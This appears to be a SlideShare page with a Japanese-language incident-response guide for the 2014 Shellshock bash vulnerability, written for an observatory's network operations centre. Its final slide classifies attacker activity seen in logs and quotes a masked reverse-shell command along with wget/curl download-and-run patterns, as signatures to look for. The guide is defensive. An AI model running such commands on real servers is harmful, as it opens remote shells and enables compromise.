Bash 脆弱性祭から抜け出そう

Masafumi Oe
Masafumi Oe助教 at 国立天文台
Bash 脆弱性祭から抜け出そう 0)bashが入ってない(/bin/sh=bashである場合あり、sh--version)なら不正アク セス可能性なし 1)Bashを実行するcgi/ pl/ shといったwebコードがなければ、不正アクセス可能 性なし 2)ある場合 • Cgi/ shが、bashを実行する場合、不正アクセス可能性あり • CentOS/RedHutのように/bin/sh= bash の場合は、shでも不正アクセス可能性あり • Perlは、system() やexec, `(バッククォート)`でシステムシェル(=bash or /bin/sh=bash)が起動する部分があるなら、不正アクセス可能性あり 例)ls–l * みたいなメタ文字 • 無論明示的に、bash(や/bin/sh)を実行したら、アウト • ここまでで、不正アクセス可能性ありの場合は次に進む。 2014/10/3 大江将史 NAOJ NOC / 1
Bash 脆弱性祭から抜け出せない (前提)bash脆弱性により、UserAgentやcookie 経由など、環境変数経由で「任意」のコー ドを実行できる。 • Cookieはアクセスログに残らないので、何をされたかがわからない。 3)2の問題CGI等がアクセスログにてアクセスされてなかったら、不正アクセス可能性なし • ただし、他の脆弱性が放置されていたなら、書き換えされてるかもしれませんので、グレーです。 4)3でアクセスログがある場合、不正アクセス可能性があり、解析必要 • UserAgnetの記録をみて、“不正アクセスの分類”から脅威を把握する • Cookie経由など“なにをしたか”記録が残らない場合もあるので、アクセス元IPアドレスを解析する。 • 他に当該IPから他コンテンツへのアクセスがないなど、通常の利用がない場合は、不正アクセス可能性あり • 実行されたコードが、suexecなど、権限昇格する場合は、[緊急対応]へ 5)不正アクセス可能性ありの場合 不正アクセスされたとしても焦って再起動とかしない。 サーバ解析チェックリストを実行、NOCへ連絡 2014/10/3 大江将史 NAOJ NOC / 2
サーバー解析チェックリスト 1. 全プロセス(ps)とnetstat–naを記録する 2. /tmp/var/tmpなど、apacheの稼働権限で書き込めるディレクトリをコピーするなど、保全する。 3. サーバーのユーザーに対して、注意喚起する。 ssh公開認証の秘密鍵を配置し、パスフレーズがない場合は、特に注意する。 4. Webサーバを一旦停止する 自動起動しないようにする 5. 不審なプロセスと通信のチェック Apache等の稼働権限で動作するプロセスを再度チェックする。 動作してたら、精査、killする前に、次のnetstatチェックをする Netstatで、tcp/udpセッションを確認し、不審な通信がないかどうかをチェックする。 IRCサーバへの通信、バックシェル用途のTCP listen、ESTABLISHEDなTCPセッションをチェック Suexecなど、実行権限の確認 権限がweb serverと異なる場合は、緊急 6. システムを再起動 5の項目を再チェック WEBサーバを再起動して、5の項目を再チェック 4のチェックに問題など発見がなければ、サービスを復旧させ、ユーザーへその旨通知する。 ただし、限りない白に近いグレーな状態であることを理解する。 2014/10/3 大江将史 NAOJ NOC / 3
[緊急対応] 権限昇格のshell実行された • 権限昇格により、パスワードや各ユーザーのファイルなどの奪取やサーバの改ざんされた 可能性がある。 • 初動対応 • NOCへ連絡 • 以下の要点をサーバのアカウントユーザーへ緊急連絡する。 • ホームディレクトリ下のファイルが流失した可能性があること • パスワードやSSHの秘密鍵が流出した可能性があること、パスワード変更、SSH公開鍵を廃棄すること • この間のアクセス中の入出力内容が流出した可能性があること • サーバ全体の正常性が担保できていないこと • 当該サーバと関連するサーバはすべて管理者を除いて、ロックアウトすること。 • 関連サーバのユーザーへも連絡すること。 • 対応 • 作業内容を詳細に逐次記録し、ここまでの経緯も可能な限り記録すること。 • サーバー解析チェックリスト4を実施し、可能な限りプロセスなどを記録・チェックすること。 • サーバを停止し、ディスクを保全すること。 • 関連サーバ上で同様の解析を開始すること。対応困難などなら、関連サーバを停止すること。 2014/10/3 大江将史 NAOJ NOC / 4
Bash 不正アクセスの分類 • プローブ活動(セーフ) • Ping • Echo • Bash –c id (以下は、脅威となります。) • リバースシェル • Sh–i> & /dev/tcp/****/12345 0>&1 • ダウンロード • wget/ curl/lwp-download • ダウンロード&実行(&消去) • /var/tmp等へwgetして、perlやshellを持ち込んで実行、ついでに消す • IRCへ接続(war等) 各コマンドのアプリケーションが実在するかどうかをチェックする。実在なければ、不正アクセス可能 性は低い。 2014/10/3 大江将史 NAOJ NOC / 5
1 of 5

Bash 脆弱性祭から抜け出そう

Download to read offline
Technology

CVE-2014-6271 shell shock 脆弱性をチェックするための手順書です。NAOJ NOC作成

Masafumi Oe
Masafumi Oe助教 at 国立天文台

Recommended

Python02 by
Python02Python02
Python02XMLProJ2014
614 views36 slides
msysgit1.8.0でプロンプトにブランチ名を表示させる by
msysgit1.8.0でプロンプトにブランチ名を表示させるmsysgit1.8.0でプロンプトにブランチ名を表示させる
msysgit1.8.0でプロンプトにブランチ名を表示させるKenichi Yamada
370 views10 slides
Word pressのテーマは firephpでハックすれば 良かったのか by
Word pressのテーマは firephpでハックすれば 良かったのかWord pressのテーマは firephpでハックすれば 良かったのか
Word pressのテーマは firephpでハックすれば 良かったのかHisateru Tanaka
2.4K views47 slides
Pukiwiki コメントスパム対策 / 電波時計で NTP by
Pukiwiki コメントスパム対策 / 電波時計で NTPPukiwiki コメントスパム対策 / 電波時計で NTP
Pukiwiki コメントスパム対策 / 電波時計で NTPKenichiro MATOHARA
1.2K views20 slides
プログラミング作法 by
プログラミング作法プログラミング作法
プログラミング作法Kota Uchida
3.5K views27 slides
Rustのタスクモデルについて by
RustのタスクモデルについてRustのタスクモデルについて
Rustのタスクモデルについてzigen
1.9K views49 slides

More Related Content

Viewers also liked

Mplsj2013 100 gを使い切るnaoj sdn by
Mplsj2013 100 gを使い切るnaoj sdnMplsj2013 100 gを使い切るnaoj sdn
Mplsj2013 100 gを使い切るnaoj sdnMasafumi Oe
1.1K views30 slides
Ip qo s functional requirements by
Ip qo s functional requirementsIp qo s functional requirements
Ip qo s functional requirementswael-b1
1.1K views85 slides
Intro to Single / Two Rate Three Color Marker (srTCM / trTCM) by
Intro to Single / Two Rate Three Color Marker (srTCM / trTCM)Intro to Single / Two Rate Three Color Marker (srTCM / trTCM)
Intro to Single / Two Rate Three Color Marker (srTCM / trTCM)Kentaro Ebisawa
9.7K views19 slides
201406ルーター開発イントロダクション by
201406ルーター開発イントロダクション201406ルーター開発イントロダクション
201406ルーター開発イントロダクションMasafumi Oe
3.8K views29 slides
QoS by
QoSQoS
QoSGopan Govindan
2.1K views20 slides
QoS (quality of service) by
QoS (quality of service)QoS (quality of service)
QoS (quality of service)Sri Safrina
8.4K views34 slides

Viewers also liked(7)

Mplsj2013 100 gを使い切るnaoj sdn by Masafumi Oe
Mplsj2013 100 gを使い切るnaoj sdnMplsj2013 100 gを使い切るnaoj sdn
Mplsj2013 100 gを使い切るnaoj sdn
Masafumi Oe1.1K views
Ip qo s functional requirements by wael-b1
Ip qo s functional requirementsIp qo s functional requirements
Ip qo s functional requirements
wael-b11.1K views
Intro to Single / Two Rate Three Color Marker (srTCM / trTCM) by Kentaro Ebisawa
Intro to Single / Two Rate Three Color Marker (srTCM / trTCM)Intro to Single / Two Rate Three Color Marker (srTCM / trTCM)
Intro to Single / Two Rate Three Color Marker (srTCM / trTCM)
Kentaro Ebisawa9.7K views
201406ルーター開発イントロダクション by Masafumi Oe
201406ルーター開発イントロダクション201406ルーター開発イントロダクション
201406ルーター開発イントロダクション
Masafumi Oe3.8K views
QoS by Gopan Govindan
QoSQoS
QoS
Gopan Govindan2.1K views
QoS (quality of service) by Sri Safrina
QoS (quality of service)QoS (quality of service)
QoS (quality of service)
Sri Safrina8.4K views
Quality of Service by Abhishek Wadhwa
Quality of ServiceQuality of Service
Quality of Service
Abhishek Wadhwa37.6K views

More from Masafumi Oe

Shell shock事件が明らかにするあなたの組織における情報セキュリティ力 by
Shell shock事件が明らかにするあなたの組織における情報セキュリティ力Shell shock事件が明らかにするあなたの組織における情報セキュリティ力
Shell shock事件が明らかにするあなたの組織における情報セキュリティ力Masafumi Oe
11K views28 slides
How to install WWLAN card on Thinkpad X1 Carbon by
How to install WWLAN card on Thinkpad X1 CarbonHow to install WWLAN card on Thinkpad X1 Carbon
How to install WWLAN card on Thinkpad X1 CarbonMasafumi Oe
1.5K views5 slides
ワイヤレス・ワイヤードにおける広帯域通信 2 by
ワイヤレス・ワイヤードにおける広帯域通信 2ワイヤレス・ワイヤードにおける広帯域通信 2
ワイヤレス・ワイヤードにおける広帯域通信 2Masafumi Oe
2.4K views69 slides
Overview of Satellite based Internet service and architecture in Japan by
Overview of Satellite based Internet service and architecture in JapanOverview of Satellite based Internet service and architecture in Japan
Overview of Satellite based Internet service and architecture in JapanMasafumi Oe
872 views15 slides
Janog震災時におけるインターネットアクセスの役割 by
Janog震災時におけるインターネットアクセスの役割Janog震災時におけるインターネットアクセスの役割
Janog震災時におけるインターネットアクセスの役割Masafumi Oe
544 views10 slides
データセンターカンファレンス基調対談_ネットワーク帯域を使いまくる by
データセンターカンファレンス基調対談_ネットワーク帯域を使いまくるデータセンターカンファレンス基調対談_ネットワーク帯域を使いまくる
データセンターカンファレンス基調対談_ネットワーク帯域を使いまくるMasafumi Oe
2.5K views40 slides

More from Masafumi Oe(8)

Shell shock事件が明らかにするあなたの組織における情報セキュリティ力 by Masafumi Oe
Shell shock事件が明らかにするあなたの組織における情報セキュリティ力Shell shock事件が明らかにするあなたの組織における情報セキュリティ力
Shell shock事件が明らかにするあなたの組織における情報セキュリティ力
Masafumi Oe11K views
How to install WWLAN card on Thinkpad X1 Carbon by Masafumi Oe
How to install WWLAN card on Thinkpad X1 CarbonHow to install WWLAN card on Thinkpad X1 Carbon
How to install WWLAN card on Thinkpad X1 Carbon
Masafumi Oe1.5K views
ワイヤレス・ワイヤードにおける広帯域通信 2 by Masafumi Oe
ワイヤレス・ワイヤードにおける広帯域通信 2ワイヤレス・ワイヤードにおける広帯域通信 2
ワイヤレス・ワイヤードにおける広帯域通信 2
Masafumi Oe2.4K views
Overview of Satellite based Internet service and architecture in Japan by Masafumi Oe
Overview of Satellite based Internet service and architecture in JapanOverview of Satellite based Internet service and architecture in Japan
Overview of Satellite based Internet service and architecture in Japan
Masafumi Oe872 views
Janog震災時におけるインターネットアクセスの役割 by Masafumi Oe
Janog震災時におけるインターネットアクセスの役割Janog震災時におけるインターネットアクセスの役割
Janog震災時におけるインターネットアクセスの役割
Masafumi Oe544 views
データセンターカンファレンス基調対談_ネットワーク帯域を使いまくる by Masafumi Oe
データセンターカンファレンス基調対談_ネットワーク帯域を使いまくるデータセンターカンファレンス基調対談_ネットワーク帯域を使いまくる
データセンターカンファレンス基調対談_ネットワーク帯域を使いまくる
Masafumi Oe2.5K views
Interop 2013 ORC ULTRA200 Project by Masafumi Oe
Interop 2013 ORC ULTRA200 Project Interop 2013 ORC ULTRA200 Project
Interop 2013 ORC ULTRA200 Project
Masafumi Oe1.1K views
The importance of connecting stability by Masafumi Oe
The importance of connecting stabilityThe importance of connecting stability
The importance of connecting stability
Masafumi Oe592 views

Recently uploaded

The Things Stack説明資料 by The Things Industries by
The Things Stack説明資料 by The Things IndustriesThe Things Stack説明資料 by The Things Industries
The Things Stack説明資料 by The Things IndustriesCRI Japan, Inc.
58 views29 slides
JJUG CCC.pptx by
JJUG CCC.pptxJJUG CCC.pptx
JJUG CCC.pptxKanta Sasaki
6 views14 slides
さくらのひやおろし2023 by
さくらのひやおろし2023さくらのひやおろし2023
さくらのひやおろし2023法林浩之
96 views58 slides
今、改めて考えるPostgreSQLプラットフォーム - マルチクラウドとポータビリティ -(PostgreSQL Conference Japan 20... by
今、改めて考えるPostgreSQLプラットフォーム - マルチクラウドとポータビリティ -(PostgreSQL Conference Japan 20...今、改めて考えるPostgreSQLプラットフォーム - マルチクラウドとポータビリティ -(PostgreSQL Conference Japan 20...
今、改めて考えるPostgreSQLプラットフォーム - マルチクラウドとポータビリティ -(PostgreSQL Conference Japan 20...NTT DATA Technology & Innovation
120 views42 slides
SNMPセキュリティ超入門 by
SNMPセキュリティ超入門SNMPセキュリティ超入門
SNMPセキュリティ超入門mkoda
355 views15 slides

Recently uploaded(11)

The Things Stack説明資料 by The Things Industries by CRI Japan, Inc.
The Things Stack説明資料 by The Things IndustriesThe Things Stack説明資料 by The Things Industries
The Things Stack説明資料 by The Things Industries
CRI Japan, Inc.58 views
JJUG CCC.pptx by Kanta Sasaki
JJUG CCC.pptxJJUG CCC.pptx
JJUG CCC.pptx
Kanta Sasaki6 views
さくらのひやおろし2023 by 法林浩之
さくらのひやおろし2023さくらのひやおろし2023
さくらのひやおろし2023
法林浩之96 views
IPsec VPNとSSL-VPNの違い by 富士通クラウドテクノロジーズ株式会社
IPsec VPNとSSL-VPNの違いIPsec VPNとSSL-VPNの違い
IPsec VPNとSSL-VPNの違い
富士通クラウドテクノロジーズ株式会社430 views
今、改めて考えるPostgreSQLプラットフォーム - マルチクラウドとポータビリティ -(PostgreSQL Conference Japan 20... by NTT DATA Technology & Innovation
今、改めて考えるPostgreSQLプラットフォーム - マルチクラウドとポータビリティ -(PostgreSQL Conference Japan 20...今、改めて考えるPostgreSQLプラットフォーム - マルチクラウドとポータビリティ -(PostgreSQL Conference Japan 20...
今、改めて考えるPostgreSQLプラットフォーム - マルチクラウドとポータビリティ -(PostgreSQL Conference Japan 20...
NTT DATA Technology & Innovation120 views
SNMPセキュリティ超入門 by mkoda
SNMPセキュリティ超入門SNMPセキュリティ超入門
SNMPセキュリティ超入門
mkoda355 views
SSH応用編_20231129.pdf by icebreaker4
SSH応用編_20231129.pdfSSH応用編_20231129.pdf
SSH応用編_20231129.pdf
icebreaker4335 views
Windows 11 information that can be used at the development site by Atomu Hidaka
Windows 11 information that can be used at the development siteWindows 11 information that can be used at the development site
Windows 11 information that can be used at the development site
Atomu Hidaka88 views
Keycloakの全体像: 基本概念、ユースケース、そして最新の開発動向 by Hitachi, Ltd. OSS Solution Center.
Keycloakの全体像: 基本概念、ユースケース、そして最新の開発動向Keycloakの全体像: 基本概念、ユースケース、そして最新の開発動向
Keycloakの全体像: 基本概念、ユースケース、そして最新の開発動向
Hitachi, Ltd. OSS Solution Center.60 views
定例会スライド_キャチs 公開用.pdf by Keio Robotics Association
定例会スライド_キャチs 公開用.pdf定例会スライド_キャチs 公開用.pdf
定例会スライド_キャチs 公開用.pdf
Keio Robotics Association111 views
速習! PostgreSQL専用HAソフトウェア: Patroni(PostgreSQL Conference Japan 2023 発表資料) by NTT DATA Technology & Innovation
速習! PostgreSQL専用HAソフトウェア: Patroni(PostgreSQL Conference Japan 2023 発表資料)速習! PostgreSQL専用HAソフトウェア: Patroni(PostgreSQL Conference Japan 2023 発表資料)
速習! PostgreSQL専用HAソフトウェア: Patroni(PostgreSQL Conference Japan 2023 発表資料)
NTT DATA Technology & Innovation18 views

Bash 脆弱性祭から抜け出そう

  • 1. Bash 脆弱性祭から抜け出そう 0)bashが入ってない(/bin/sh=bashである場合あり、sh--version)なら不正アク セス可能性なし 1)Bashを実行するcgi/ pl/ shといったwebコードがなければ、不正アクセス可能 性なし 2)ある場合 • Cgi/ shが、bashを実行する場合、不正アクセス可能性あり • CentOS/RedHutのように/bin/sh= bash の場合は、shでも不正アクセス可能性あり • Perlは、system() やexec, `(バッククォート)`でシステムシェル(=bash or /bin/sh=bash)が起動する部分があるなら、不正アクセス可能性あり 例)ls–l * みたいなメタ文字 • 無論明示的に、bash(や/bin/sh)を実行したら、アウト • ここまでで、不正アクセス可能性ありの場合は次に進む。 2014/10/3 大江将史 NAOJ NOC / 1
  • 2. Bash 脆弱性祭から抜け出せない (前提)bash脆弱性により、UserAgentやcookie 経由など、環境変数経由で「任意」のコー ドを実行できる。 • Cookieはアクセスログに残らないので、何をされたかがわからない。 3)2の問題CGI等がアクセスログにてアクセスされてなかったら、不正アクセス可能性なし • ただし、他の脆弱性が放置されていたなら、書き換えされてるかもしれませんので、グレーです。 4)3でアクセスログがある場合、不正アクセス可能性があり、解析必要 • UserAgnetの記録をみて、“不正アクセスの分類”から脅威を把握する • Cookie経由など“なにをしたか”記録が残らない場合もあるので、アクセス元IPアドレスを解析する。 • 他に当該IPから他コンテンツへのアクセスがないなど、通常の利用がない場合は、不正アクセス可能性あり • 実行されたコードが、suexecなど、権限昇格する場合は、[緊急対応]へ 5)不正アクセス可能性ありの場合 不正アクセスされたとしても焦って再起動とかしない。 サーバ解析チェックリストを実行、NOCへ連絡 2014/10/3 大江将史 NAOJ NOC / 2
  • 3. サーバー解析チェックリスト 1. 全プロセス(ps)とnetstat–naを記録する 2. /tmp/var/tmpなど、apacheの稼働権限で書き込めるディレクトリをコピーするなど、保全する。 3. サーバーのユーザーに対して、注意喚起する。 ssh公開認証の秘密鍵を配置し、パスフレーズがない場合は、特に注意する。 4. Webサーバを一旦停止する 自動起動しないようにする 5. 不審なプロセスと通信のチェック Apache等の稼働権限で動作するプロセスを再度チェックする。 動作してたら、精査、killする前に、次のnetstatチェックをする Netstatで、tcp/udpセッションを確認し、不審な通信がないかどうかをチェックする。 IRCサーバへの通信、バックシェル用途のTCP listen、ESTABLISHEDなTCPセッションをチェック Suexecなど、実行権限の確認 権限がweb serverと異なる場合は、緊急 6. システムを再起動 5の項目を再チェック WEBサーバを再起動して、5の項目を再チェック 4のチェックに問題など発見がなければ、サービスを復旧させ、ユーザーへその旨通知する。 ただし、限りない白に近いグレーな状態であることを理解する。 2014/10/3 大江将史 NAOJ NOC / 3
  • 4. [緊急対応] 権限昇格のshell実行された • 権限昇格により、パスワードや各ユーザーのファイルなどの奪取やサーバの改ざんされた 可能性がある。 • 初動対応 • NOCへ連絡 • 以下の要点をサーバのアカウントユーザーへ緊急連絡する。 • ホームディレクトリ下のファイルが流失した可能性があること • パスワードやSSHの秘密鍵が流出した可能性があること、パスワード変更、SSH公開鍵を廃棄すること • この間のアクセス中の入出力内容が流出した可能性があること • サーバ全体の正常性が担保できていないこと • 当該サーバと関連するサーバはすべて管理者を除いて、ロックアウトすること。 • 関連サーバのユーザーへも連絡すること。 • 対応 • 作業内容を詳細に逐次記録し、ここまでの経緯も可能な限り記録すること。 • サーバー解析チェックリスト4を実施し、可能な限りプロセスなどを記録・チェックすること。 • サーバを停止し、ディスクを保全すること。 • 関連サーバ上で同様の解析を開始すること。対応困難などなら、関連サーバを停止すること。 2014/10/3 大江将史 NAOJ NOC / 4
  • 5. Bash 不正アクセスの分類 • プローブ活動(セーフ) • Ping • Echo • Bash –c id (以下は、脅威となります。) • リバースシェル • Sh–i> & /dev/tcp/****/12345 0>&1 • ダウンロード • wget/ curl/lwp-download • ダウンロード&実行(&消去) • /var/tmp等へwgetして、perlやshellを持ち込んで実行、ついでに消す • IRCへ接続(war等) 各コマンドのアプリケーションが実在するかどうかをチェックする。実在なければ、不正アクセス可能 性は低い。 2014/10/3 大江将史 NAOJ NOC / 5